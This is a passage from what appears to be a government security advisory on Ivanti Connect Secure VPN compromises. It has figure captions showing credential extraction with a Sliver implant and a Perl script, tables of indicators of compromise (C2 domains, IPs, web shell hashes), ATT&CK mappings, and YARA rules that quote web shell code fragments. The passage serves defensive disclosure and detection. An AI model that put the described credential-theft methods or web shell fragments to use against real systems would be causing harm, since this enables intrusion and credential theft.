1854.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%204%20-%20Leverage%20Sliver%20Implant%20to%20Run%20Pearl%20Script%20for%20Retrieval%20of%20Cached%20Domain%20Administrator%20Credentials.png?itok=yjpntiW3" width="565" height="442" alt="Figure 4: Leverage Sliver Implant to Run Pearl Script for Retrieval of Cached Domain Administrator Credentials">
1855.  
1856.  
1857.  
1858. </div>
1859.      <figcaption class="c-figure__caption"><em>Figure 4: Leverage Sliver Implant to Run Perl Script for Retrieval of Cached Domain Administrator Credentials</em></figcaption>
1860.  </figure>
1861. <p>Below is a demonstration of the capacity for post exploitation exfiltration of base64 encoded cleartext credentials for active directory users and their associated NTLM password hashes:</p>
1862.  
1863.  
1864.  
1865. <figure class="c-figure c-figure--image u-align-center" role="group">
1866.  
1867.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%205%20-%20Configuration%20of%20User%20Realm.png?itok=CJ-X8tOz" width="624" height="276" alt="Figure 5: Configuration of User Realm">
1868.  
1869.  
1870.  
1871. </div>
1872.      <figcaption class="c-figure__caption"><em>Figure 5: Configuration of User Realm</em></figcaption>
1873.  </figure>
1874.  
1875.  
1876.  
1877. <figure class="c-figure c-figure--image u-align-center" role="group">
1878.  
1879.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%206%20-%20User%20Realm%20Configuration%20to%20Domain.png?itok=AC292r6O" width="624" height="392" alt="Figure 6: User Realm Configuration to Domain">
1880.  
1881.  
1882.  
1883. </div>
1884.      <figcaption class="c-figure__caption"><em>Figure 6: User Realm Configuration to Domain</em></figcaption>
1885.  </figure>
1886.  
1887.  
1888.  
1889. <figure class="c-figure c-figure--image u-align-center" role="group">
1890.  
1891.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%207%20-%20Configuration%20of%20User%20Realm%20Mapping.png?itok=ixaOaPnV" width="624" height="281" alt="Figure 7: Configuration of User Realm Mapping">
1892.  
1893.  
1894.  
1895. </div>
1896.      <figcaption class="c-figure__caption"><em>Figure 7: Configuration of User Realm Mapping</em></figcaption>
1897.  </figure>
1898.  
1899.  
1900.  
1901. <figure class="c-figure c-figure--image u-align-center" role="group">
1902.  
1903.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%208%20-%20Login%20as%20%E2%80%9Cvpnuser1%E2%80%9D%20to%20Establish%20an%20Active%20Session.png?itok=N5hHlXve" width="1024" height="661" alt="Figure 8 - Login as “vpnuser1” to Establish an Active Session">
1904.  
1905.  
1906.  
1907. </div>
1908.      <figcaption class="c-figure__caption"><em>Figure 8: Login as “vpnuser1” to Establish an Active Session</em></figcaption>
1909.  </figure>
1910.  
1911.  
1912.  
1913. <figure class="c-figure c-figure--image u-align-center" role="group">
1914.  
1915.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%209%20-%20Using%20Sliver%20Implant%20as%20Shown%20in%20Figure%203.png?itok=z6JmYGkg" width="512" height="394" alt="Figure 9: Using Sliver Implant as Shown in Figure 3, Execute Pearl Script to Retrieve base64 Encoded Cleartext Password and NTLM Password Hash for Authenticated User">
1916.  
1917.  
1918.  
1919. </div>
1920.      <figcaption class="c-figure__caption"><em>Figure 9: Using Sliver Implant as Shown in Figure 3, Execute Perl Script to Retrieve base64 Encoded Cleartext Password and NTLM Password Hash for Authenticated User</em></figcaption>
1921.  </figure>
1922.  
1923.  
1924.  
1925. <figure class="c-figure c-figure--image u-align-center" role="group">
1926.  
1927.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%2010%20-%20Decode%20base64%20Encoded%20Blob%20to%20Display%20Users%20Plaintext%20Credentials.png?itok=6KVy46Jp" width="624" height="39" alt="Figure 10: Decode base64 Encoded Blob to Display Users Plaintext Credentials">
1928.  
1929.  
1930.  
1931. </div>
1932.      <figcaption class="c-figure__caption"><em>Figure 10: Decode base64 Encoded Blob to Display User’s Plaintext Credentials</em></figcaption>
1933.  </figure>
1934.  
1935.  
1936.  
1937. <figure class="c-figure c-figure--image u-align-center" role="group">
1938.  
1939.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%2011%20-%20Using%20Mimikatz%20Validate%20NTLM%20Password%20Hash%20Obtained%20in%20Figure%2010%20Matched%20Active%20Directory%20User%20Credential%20Hash.png?itok=pV_6lHkx" width="567" height="342" alt="Figure 11: Using Mimikatz Validate NTLM Password Hash Obtained in Figure 10 Matched Active Directory User Credential Hash">
1940.  
1941.  
1942.  
1943. </div>
1944.      <figcaption class="c-figure__caption"><em>Figure 11: Using Mimikatz Validate NTLM Password Hash Obtained in Figure 10 Matches Active Directory User Credential Hash</em></figcaption>
1945.  </figure>
1946.  
1947.  
1948.  
1949. <figure class="c-figure c-figure--image u-align-center" role="group">
1950.  
1951.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%2012%20-%20Inactive%20Sessions%20for%20%E2%80%9Cvpnuser2%E2%80%9D%20and%20%E2%80%9Cvpnuser3%E2%80%9D%20Appear%20in%20Server%20Logs.png?itok=3ga_ODot" width="624" height="287" alt="Figure 12: Inactive Sessions for “vpnuser2” and “vpnuser3” Appear in Server Logs">
1952.  
1953.  
1954.  
1955. </div>
1956.      <figcaption class="c-figure__caption"><em>Figure 12: Inactive Sessions for “vpnuser2” and “vpnuser3” Appear in Server Logs</em></figcaption>
1957.  </figure>
1958.  
1959.  
1960.  
1961. <figure class="c-figure c-figure--image u-align-center" role="group">
1962.  
1963.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%2013%20-%20Exfiltrate.png?itok=_lD9hyAI" width="469" height="365" alt="Figure 13: Exfiltrate “lmdb/data” and “lmdb-backup/data” data.mb Database Files Containing Credentials for Active and Inactive Sessions">
1964.  
1965.  
1966.  
1967. </div>
1968.      <figcaption class="c-figure__caption"><em>Figure 13: Exfiltrate “lmdb/data” and “lmdb-backup/data” data.mb Database Files Containing Credentials for Active and Inactive Sessions</em></figcaption>
1969.  </figure>
1970.  
1971.  
1972.  
1973. <figure class="c-figure c-figure--image u-align-center" role="group">
1974.  
1975.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%2014%20-%20Parse%20Database%20Files%20to%20Disclose%20base64%20Encoded%20Plaintext%20Credentials%20from%20LMDB%20Database%20Files.png?itok=WMgVXObH" width="464" height="365" alt="Figure 14: Parse Database Files to Disclose base64 Encoded Plaintext Credentials from LMDB Database Files">
1976.  
1977.  
1978.  
1979. </div>
1980.      <figcaption class="c-figure__caption"><em>Figure 14: Parse Database Files to Disclose base64 Encoded Plaintext Credentials from LMDB Database Files</em></figcaption>
1981.  </figure>
1982.  
1983.  
1984.  
1985. <figure class="c-figure c-figure--image u-align-center" role="group">
1986.  
1987.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%2015%20-%20Parse%20Database%20Files%20to%20Disclose%20NTLM%20Hashes%20from%20LMDB%20Database%20Files.png?itok=KxV4Vzxx" width="624" height="132" alt="Figure 15: Parse Database Files to Disclose NTLM Hashes from LMDB Database Files">
1988.  
1989.  
1990.  
1991. </div>
1992.      <figcaption class="c-figure__caption"><em>Figure 15: Parse Database Files to Disclose NTLM Hashes from LMDB Database Files</em></figcaption>
1993.  </figure>
1994.  
1995.  
1996.  
1997. <figure class="c-figure c-figure--image u-align-center" role="group">
1998.  
1999.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%2016%20-%20Parse%20Backup%20Database%20Files%20to%20Disclose%20Additional%20base64%20Encoded%20Plaintext%20Credentials.png?itok=iNM0lpq_" width="624" height="607" alt="Figure 16: Parse Backup Database Files to Disclose Additional base64 Encoded Plaintext Credentials">
2000.  
2001.  
2002.  
2003. </div>
2004.      <figcaption class="c-figure__caption"><em>Figure 16: Parse Backup Database Files to Disclose Additional base64 Encoded Plaintext Credentials from LMDB-Backup Database Files</em></figcaption>
2005.  </figure>
2006.  
2007.  
2008.  
2009. <figure class="c-figure c-figure--image u-align-center" role="group">
2010.  
2011.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%2017%20-%20Decode%20Credentials%20from%20LMDB-Backup%20Database%20Files.png?itok=dDHAAxh2" width="624" height="39" alt="Figure 17: Decode Credentials from LMDB-Backup Database Files">
2012.  
2013.  
2014.  
2015. </div>
2016.      <figcaption class="c-figure__caption"><em>Figure 17: Decode Credentials from LMDB-Backup Database Files</em></figcaption>
2017.  </figure>
2018.  
2019.  
2020.  
2021. <figure class="c-figure c-figure--image u-align-center" role="group">
2022.  
2023.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%2018%20-%20Parse%20Database%20Files%20to%20Disclose%20NTLM%20Hashes.png?itok=gdcYeQM8" width="624" height="131" alt="Figure 18: Parse Database Files to Disclose NTLM Hashes for Additional Users from LMDB-Backup Database Files">
2024.  
2025.  
2026.  
2027. </div>
2028.      <figcaption class="c-figure__caption"><em>Figure 18: Parse Database Files to Disclose NTLM Hashes for Additional Users from LMDB-Backup Database Files</em></figcaption>
2029.  </figure>
2030. <h3><strong>APPENDIX B: INDICATORS OF COMPROMISE</strong></h3>
2031. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
2032. <caption><em>Table 1: Ivanti Connect Secure VPN Indicators of Compromise</em></caption>
2033. <thead>
2034. <tr>
2035. <th role="columnheader" data-tablesaw-priority="persist"><strong>Filename</strong></th>
2036. <th role="columnheader"><strong>Description</strong></th>
2037. <th role="columnheader"><strong>Purpose</strong></th>
2038. </tr>
2039. </thead>
2040. <tbody>
2041. <tr>
2042. <td>/home/perl/DSLogConfig.pm</td>
2043. <td>Modified Perl module.</td>
2044. <td>Designed to execute <code>sessionserver.pl</code>.</td>
2045. </tr>
2046. <tr>
2047. <td>/usr/bin/a.sh</td>
2048. <td>gcore.in core dump script.</td>
2049. <td> </td>
2050. </tr>
2051. <tr>
2052. <td>/bin/netmon</td>
2053. <td>Sliver binary.</td>
2054. <td> </td>
2055. </tr>
2056. <tr>
2057. <td>/home/venv3/lib/python3.6/site-packages/*.egg</td>
2058. <td>Python package containing WIREFIRE among other files.</td>
2059. <td> </td>
2060. </tr>
2061. <tr>
2062. <td>/home/etc/sql/dsserver/sessionserver.pl</td>
2063. <td>Perl script to remount the filesystem with read/write access.</td>
2064. <td>Make <strong>sessionserver.sh </strong>executable, execute it, then restore original mount settings.</td>
2065. </tr>
2066. <tr>
2067. <td>/home/etc/sql/dsserver/sessionserver.sh</td>
2068. <td>Script executed by <code>sessionserver.pl</code>.</td>
2069. <td>Uses regular expressions to modify <code>compcheckresult.cgi</code> to insert a web shell into it; also creates a series of entries into files associated with the In-build Integrity Checker Tool to evade detection when periodic scans are run.</td>
2070. </tr>
2071. <tr>
2072. <td>/home/webserver/htdocs/dana-na/auth/compcheckresult.cgi</td>
2073. <td>Modified legitimate component of the ICS VPN appliance, with new Perl module imports added and a one-liner to execute commands based on request parameters.</td>
2074. <td>Allows remote code execution over the Internet if the attacker can craft a request with the correct parameters.</td>
2075. </tr>
2076. <tr>
2077. <td>/home/webserver/htdocs/dana-na/auth/lastauthserverused.js</td>
2078. <td>Modified legitimate JavaScript component loaded by user login page of the Web SSL VPN component of Ivanti Connect Secure.</td>
2079. <td>Modified to harvest entered credentials and send them to a remote URL on an attacker-controlled domain.</td>
2080. </tr>
2081. </tbody>
2082. </table>
2083. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
2084. <caption><em>Table 2: Ivanti Connect Secure VPN Indicators of Compromise</em></caption>
2085. <thead>
2086. <tr>
2087. <th role="columnheader" data-tablesaw-priority="persist"><strong>Value</strong></th>
2088. <th role="columnheader"><strong>Type</strong></th>
2089. <th role="columnheader"><strong>Description</strong></th>
2090. </tr>
2091. </thead>
2092. <tbody>
2093. <tr>
2094. <td>88.119.169[.]227</td>
2095. <td>IP Address</td>
2096. <td> </td>
2097. </tr>
2098. <tr>
2099. <td>103.13.28[.]40</td>
2100. <td>IP Address</td>
2101. <td> </td>
2102. </tr>
2103. <tr>
2104. <td>46.8.68[.]100</td>
2105. <td>IPv4</td>
2106. <td> </td>
2107. </tr>
2108. <tr>
2109. <td>206.189.208[.]156</td>
2110. <td>IP Address</td>
2111. <td>DigitalOcean IP address tied to UTA0178.</td>
2112. </tr>
2113. <tr>
2114. <td>gpoaccess[.]com</td>
2115. <td>Hostname</td>
2116. <td>Suspected UTA0178 domain discovered via domain registration patterns.</td>
2117. </tr>
2118. <tr>
2119. <td>webb-institute[.]com</td>
2120. <td>Hostname</td>
2121. <td>Suspected UTA0178 domain discovered via domain registration patterns.</td>
2122. </tr>
2123. <tr>
2124. <td>symantke[.]com</td>
2125. <td>Hostname</td>
2126. <td>UTA0178 domain used to collect credentials from compromised devices.</td>
2127. </tr>
2128. <tr>
2129. <td>75.145.243[.]85</td>
2130. <td>IP Address</td>
2131. <td>UTA0178 IP address observed interacting with compromised device.</td>
2132. </tr>
2133. <tr>
2134. <td>47.207.9[.]89</td>
2135. <td>IP Address</td>
2136. <td>UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network.</td>
2137. </tr>
2138. <tr>
2139. <td>98.160.48[.]170</td>
2140. <td>IP Address</td>
2141. <td>UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network.</td>
2142. </tr>
2143. <tr>
2144. <td>173.220.106[.]166</td>
2145. <td>IP Address</td>
2146. <td>UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network.</td>
2147. </tr>
2148. <tr>
2149. <td>73.128.178[.]221</td>
2150. <td>IP Address</td>
2151. <td>UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network.</td>
2152. </tr>
2153. <tr>
2154. <td>50.243.177[.]161</td>
2155. <td>IP Address</td>
2156. <td>UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network.</td>
2157. </tr>
2158. <tr>
2159. <td>50.213.208[.]89</td>
2160. <td>IP Address</td>
2161. <td>UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network.</td>
2162. </tr>
2163. <tr>
2164. <td>64.24.179[.]210</td>
2165. <td>IP Address</td>
2166. <td>UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network.</td>
2167. </tr>
2168. <tr>
2169. <td>75.145.224[.]109</td>
2170. <td>IP Address</td>
2171. <td>
2172. <p>UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network.</p>
2173. <p> </p>
2174. </td>
2175. </tr>
2176. <tr>
2177. <td>50.215.39[.]49</td>
2178. <td>IP Address</td>
2179. <td>UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network.</td>
2180. </tr>
2181. <tr>
2182. <td>71.127.149[.]194</td>
2183. <td> </td>
2184. <td>
2185. <p>UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network.</p>
2186. <p> </p>
2187. </td>
2188. </tr>
2189. <tr>
2190. <td>173.53.43[.]7</td>
2191. <td> </td>
2192. <td>UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network.</td>
2193. </tr>
2194. </tbody>
2195. </table>
2196. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
2197. <caption><em>Table 3: Host-Based Indicators (HBIs) Indicators of Compromise</em></caption>
2198. <thead>
2199. <tr>
2200. <th role="columnheader" data-tablesaw-priority="persist"><strong>Filename</strong></th>
2201. <th role="columnheader"><strong>Hash Value</strong></th>
2202. <th role="columnheader"><strong>Description</strong></th>
2203. </tr>
2204. </thead>
2205. <tbody>
2206. <tr>
2207. <td>Cav-0.1-py3.6.egg</td>
2208. <td>ed4b855941d6d7e07aacf016a2402c4c870876a050a4a547af194f5a9b47945f</td>
2209. <td>WIREFIRE web shell</td>
2210. </tr>
2211. <tr>
2212. <td>Health.py</td>
2213. <td>3045f5b3d355a9ab26ab6f44cc831a83</td>
2214. <td>CHAINLINE web shell</td>
2215. </tr>
2216. <tr>
2217. <td>compcheckresult.cgi</td>
2218. <td>3d97f55a03ceb4f71671aa2ecf5b24e9</td>
2219. <td>CHAINLINE web shell</td>
2220. </tr>
2221. <tr>
2222. <td>lastauthserverused.js</td>
2223. <td>2ec505088b942c234f39a37188e80d7a</td>
2224. <td>LIGHTWIRE web shell</td>
2225. </tr>
2226. <tr>
2227. <td>lastauthserverused.js</td>
2228. <td>8eb042da6ba683ef1bae460af103cc44</td>
2229. <td>WARPWIRE credential harvester variant</td>
2230. </tr>
2231. <tr>
2232. <td>lastauthserverused.js</td>
2233. <td>a739bd4c2b9f3679f43579711448786f</td>
2234. <td>WARPWIRE credential harvester variant</td>
2235. </tr>
2236. <tr>
2237. <td>lastauthserverused.js</td>
2238. <td>a81813f70151a022ea1065b7f4d6b5ab</td>
2239. <td>WARPWIRE credential harvester variant</td>
2240. </tr>
2241. <tr>
2242. <td>lastauthserverused.js</td>
2243. <td>d0c7a334a4d9dcd3c6335ae13bee59ea</td>
2244. <td>WARPWIRE credential harvester variant</td>
2245. </tr>
2246. <tr>
2247. <td>lastauthserverused.js</td>
2248. <td>e8489983d73ed30a4240a14b1f161254</td>
2249. <td>WARPWIRE credential harvester variant</td>
2250. </tr>
2251. <tr>
2252. <td>logo.gif</td>
2253. <td>N/A — varies</td>
2254. <td>Configuration and cache dump or CAV web server log exfiltration</td>
2255. </tr>
2256. <tr>
2257. <td>login.gif</td>
2258. <td>N/A — varies</td>
2259. <td>Configuration and cache dump</td>
2260. </tr>
2261. <tr>
2262. <td>[a-fA-f0-9]{10\.css</td>
2263. <td>N/A — varies</td>
2264. <td>Configuration and cache dump</td>
2265. </tr>
2266. <tr>
2267. <td>visits.py</td>
2268. <td>N/A — varies</td>
2269. <td>WIREFIRE web shell</td>
2270. </tr>
2271. </tbody>
2272. </table>
2273. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
2274. <caption><em>Table 4: Host-Based Indicators (HBIs) Indicators of Compromise</em></caption>
2275. <thead>
2276. <tr>
2277. <th role="columnheader" data-tablesaw-priority="persist"><strong>Network Indicator</strong></th>
2278. <th role="columnheader"><strong>Type</strong></th>
2279. <th role="columnheader"><strong>Description</strong></th>
2280. </tr>
2281. </thead>
2282. <tbody>
2283. <tr>
2284. <td>symantke[.]com</td>
2285. <td>Domain</td>
2286. <td>WARPWIRE C2 server</td>
2287. </tr>
2288. <tr>
2289. <td>miltonhouse[.]nl</td>
2290. <td>Domain</td>
2291. <td>WARPWIRE variant C2 server</td>
2292. </tr>
2293. <tr>
2294. <td>entraide-internationale[.]fr</td>
2295. <td>Domain</td>
2296. <td>WARPWIRE variant C2 server</td>
2297. </tr>
2298. <tr>
2299. <td>api.d-n-s[.]name</td>
2300. <td>Domain</td>
2301. <td>WARPWIRE variant C2 server</td>
2302. </tr>
2303. <tr>
2304. <td>cpanel.netbar[.]org</td>
2305. <td>Domain</td>
2306. <td>WARPWIRE variant C2 server</td>
2307. </tr>
2308. <tr>
2309. <td>clickcom[.]click</td>
2310. <td>Domain</td>
2311. <td>WARPWIRE variant C2 server</td>
2312. </tr>
2313. <tr>
2314. <td>clicko[.]click</td>
2315. <td>Domain</td>
2316. <td>WARPWIRE variant C2 server</td>
2317. </tr>
2318. <tr>
2319. <td>duorhytm[.]fun</td>
2320. <td>Domain</td>
2321. <td>WARPWIRE variant C2 server</td>
2322. </tr>
2323. <tr>
2324. <td>line-api[.]com</td>
2325. <td>Domain</td>
2326. <td>WARPWIRE variant C2 server</td>
2327. </tr>
2328. <tr>
2329. <td>areekaweb[.]com</td>
2330. <td>Domain</td>
2331. <td>WARPWIRE variant C2 server</td>
2332. </tr>
2333. <tr>
2334. <td>ehangmun[.]com</td>
2335. <td>Domain</td>
2336. <td>WARPWIRE variant C2 server</td>
2337. </tr>
2338. <tr>
2339. <td>secure-cama[.]com</td>
2340. <td>Domain</td>
2341. <td>WARPWIRE variant C2 server</td>
2342. </tr>
2343. <tr>
2344. <td>146.0.228[.]66</td>
2345. <td>IPv4</td>
2346. <td>WARPWIRE variant C2 server</td>
2347. </tr>
2348. <tr>
2349. <td>159.65.130[.]146</td>
2350. <td>IPv4</td>
2351. <td>WARPWIRE variant C2 server</td>
2352. </tr>
2353. <tr>
2354. <td>8.137.112[.]245</td>
2355. <td>IPv4</td>
2356. <td>WARPWIRE variant C2 server</td>
2357. </tr>
2358. <tr>
2359. <td>91.92.254[.]14</td>
2360. <td>IPv4</td>
2361. <td>WARPWIRE variant C2 server</td>
2362. </tr>
2363. <tr>
2364. <td>186.179.39[.]235 </td>
2365. <td>IPv4</td>
2366. <td>Mass exploitation activity</td>
2367. </tr>
2368. <tr>
2369. <td>50.215.39[.]49</td>
2370. <td>IPv4</td>
2371. <td>Post-exploitation activity</td>
2372. </tr>
2373. <tr>
2374. <td>45.61.136[.]14</td>
2375. <td>IPv4</td>
2376. <td>Post-exploitation activity</td>
2377. </tr>
2378. <tr>
2379. <td>173.220.106[.]166</td>
2380. <td>IPv4</td>
2381. <td>Post-exploitation activity</td>
2382. </tr>
2383. </tbody>
2384. </table>
2385. <h3><strong>APPENDIX C: MITRE ATT&CK TACTICS AND TECHNIQUES</strong></h3>
2386. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
2387. <caption><em>Table 5: Cyber Actors ATT&CK Techniques for Enterprise</em></caption>
2388. <thead>
2389. <tr>
2390. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Initial Access</strong></th>
2391. <th scope="col" role="columnheader"> </th>
2392. <th scope="col" role="columnheader"> </th>
2393. </tr>
2394. <tr>
2395. <th role="columnheader"><strong>Technique Title</strong></th>
2396. <th role="columnheader"><strong>ID</strong></th>
2397. <th role="columnheader"><strong>Use</strong></th>
2398. </tr>
2399. <tr>
2400. <th role="columnheader"><strong>Persistence</strong></th>
2401. <th role="columnheader"> </th>
2402. <th role="columnheader"> </th>
2403. </tr>
2404. <tr>
2405. <th role="columnheader"><strong>Technique Title</strong></th>
2406. <th role="columnheader"><strong>ID</strong></th>
2407. <th role="columnheader"><strong>Use</strong></th>
2408. </tr>
2409. <tr>
2410. <th role="columnheader"><strong>Execution</strong></th>
2411. <th role="columnheader"> </th>
2412. <th role="columnheader"> </th>
2413. </tr>
2414. <tr>
2415. <th role="columnheader"><strong>Technique Title</strong></th>
2416. <th role="columnheader"><strong>ID</strong></th>
2417. <th role="columnheader"><strong>Use</strong></th>
2418. </tr>
2419. </thead>
2420. <tbody>
2421. <tr>
2422. <td>Exploit Public-Facing Applications</td>
2423. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1190/" title="Exploit Public-Facing Applications">T1190</a></td>
2424. <td>Cyber actors will use custom web shells planted on public facing applications which allows persistence in victims’ environment.</td>
2425. </tr>
2426. <tr>
2427. <td>Valid Accounts</td>
2428. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1078/" title="Valid Accounts">T1078</a></td>
2429. <td>Cyber actors leverage compromised accounts to laterally move within internal systems via RDP, SBD, and SSH.</td>
2430. </tr>
2431. <tr>
2432. <td>Server Software Component: Web Shell</td>
2433. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1505/003/" title="Server Software Component: Web Shell">T1505.003</a></td>
2434. <td>Cyber actors may use web shells on internal- and external-facing web servers to establish persistent access to systems.</td>
2435. </tr>
2436. <tr>
2437. <td>Command and Scripting Interpreter: PowerShell</td>
2438. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a></td>
2439. <td>Cyber actors leverage code execution from request parameters that are decoded from hex to base64 decoded, then passed to <a href="https://learn.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load?view=net-8.0" title="Assembly.Load Method">Assembly.Load()</a>. Which is used to execute arbitrary powershell commands.</td>
2440. </tr>
2441. <tr>
2442. <td>Exploitation for Client Execution</td>
2443. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1203/" title="Exploitation for Client Execution">T1203</a></td>
2444. <td>Cyber actors will exploit software vulnerabilities such as command-injection and achieve unauthenticated remote code execution (RCE).</td>
2445. </tr>
2446. </tbody>
2447. </table>
2448. <h3><strong>APPENDIX D: DETECTION METHODS</strong></h3>
2449. <table>
2450. <tbody>
2451. <tr>
2452. <td>
2453. <p><code>rule apt_webshell_pl_complyshell: UTA0178</code><br><code>{</code><br><code>    meta:</code><br><code>        author = "threatintel@volexity.com"</code><br><code>        date = "2023-12-13"</code><br><code>        description = "Detection for the COMPLYSHELL webshell."</code><br><code>        hash1 = "8bc8f4da98ee05c9d403d2cb76097818de0b524d90bea8ed846615e42cb031d2"</code><br><code>        os = "linux"</code><br><code>        os_arch = "all"</code><br><code>        report = "TIB-20231215"</code><br><code>        scan_context = "file,memory"</code><br><code>        last_modified = "2024-01-09T10:05Z"</code><br><code>        license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"</code><br><code>        rule_id = 9995</code><br><code>        version = 4</code></p>
2454. <p><code>    strings:</code><br><code>        $s = "eval{my $c=Crypt::RC4->new("</code></p>
2455. <p><code>    condition:</code><br><code>        $s</code><br><code>}</code></p>
2456. </td>
2457. </tr>
2458. </tbody>
2459. </table>
2460. <table>
2461. <tbody>
2462. <tr>
2463. <td>
2464. <p><code>rule apt_webshell_aspx_glasstoken: UTA0178</code><br><code>{</code><br><code>    meta:</code><br><code>        author = "threatintel@volexity.com"</code><br><code>        date = "2023-12-12"</code><br><code>        description = "Detection for a custom webshell seen on external facing server. The webshell contains two functions, the first is to act as a Tunnel, using code borrowed from reGeorg, the second is custom code to execute arbitrary .NET code."</code><br><code>        hash1 = "26cbb54b1feb75fe008e36285334d747428f80aacdb57badf294e597f3e9430d"</code><br><code>        os = "win"</code><br><code>        os_arch = "all"</code><br><code>        report = "TIB-20231215"</code><br><code>        scan_context = "file,memory"</code><br><code>        last_modified = "2024-01-09T10:08Z"</code><br><code>        license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"</code><br><code>        rule_id = 9994</code><br><code>        version = 5</code></p>
2465. <p><code>    strings:</code><br><code>        $s1 = "=Convert.FromBase64String(System.Text.Encoding.Default.GetString(" ascii</code><br><code>        $re = /Assembly\.Load\(errors\)\.CreateInstance\("[a-z0-9A-Z]{4,12}"\).GetHashCode\(\);/</code></p>
2466. <p><code>    condition:</code><br><code>        for any i in (0..#s1):</code><br><code>            (</code><br><code>                $re in (@s1[i]..@s1[i]+512)</code><br><code>            )</code><br><code>}</code></p>
2467. </td>
2468. </tr>
2469. </tbody>
2470. </table>
2471. <table>
2472. <tbody>
2473. <tr>
2474. <td>
2475. <p><code>rule webshell_aspx_regeorg</code><br><code>{</code><br><code>    meta:</code><br><code>        author = "threatintel@volexity.com"</code><br><code>        date = "2018-08-29"</code><br><code>        description = "Detects the reGeorg webshell based on common strings in the webshell. May also detect other webshells which borrow code from ReGeorg."</code><br><code>        hash = "9d901f1a494ffa98d967ee6ee30a46402c12a807ce425d5f51252eb69941d988"</code><br><code>        os = "win"</code><br><code>        os_arch = "all"</code><br><code>        reference = "https://github.com/L-codes/Neo-reGeorg/blob/master/templates/tunnel.aspx"</code><br><code>        report = "TIB-20231215"</code><br><code>        scan_context = "file,memory"</code><br><code>        last_modified = "2024-01-09T10:04Z"</code><br><code>        license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"</code><br><code>        rule_id = 410</code><br><code>        version = 7</code></p>
2476. <p><code>    strings:</code><br><code>        $a1 = "every office needs a tool like Georg" ascii</code><br><code>        $a2 = "cmd = Request.QueryString.Get(\"cmd\")" ascii</code><br><code>        $a3 = "exKak.Message" ascii</code></p>
2477. <p><code>        $proxy1 = "if (rkey != \"Content-Length\" && rkey != \"Transfer-Encoding\")"</code></p>
2478. <p><code>        $proxy_b1 = "StreamReader repBody = new StreamReader(response.GetResponseStream(), Encoding.GetEncoding(\"UTF-8\"));" ascii</code><br><code>        $proxy_b2 = "string rbody = repBody.ReadToEnd();" ascii</code><br><code>        $proxy_b3 = "Response.AddHeader(\"Content-Length\", rbody.Length.ToString());" ascii</code></p>
2479. <p><code>    condition:</code><br><code>        any of ($a*) or</code><br><code>        $proxy1 or</code><br><code>        all of ($proxy_b*)</code><br><code>}</code></p>
2480. </td>
2481. </tr>
2482. </tbody>
2483. </table>
2484. <table>
2485. <tbody>
2486. <tr>
2487. <td>
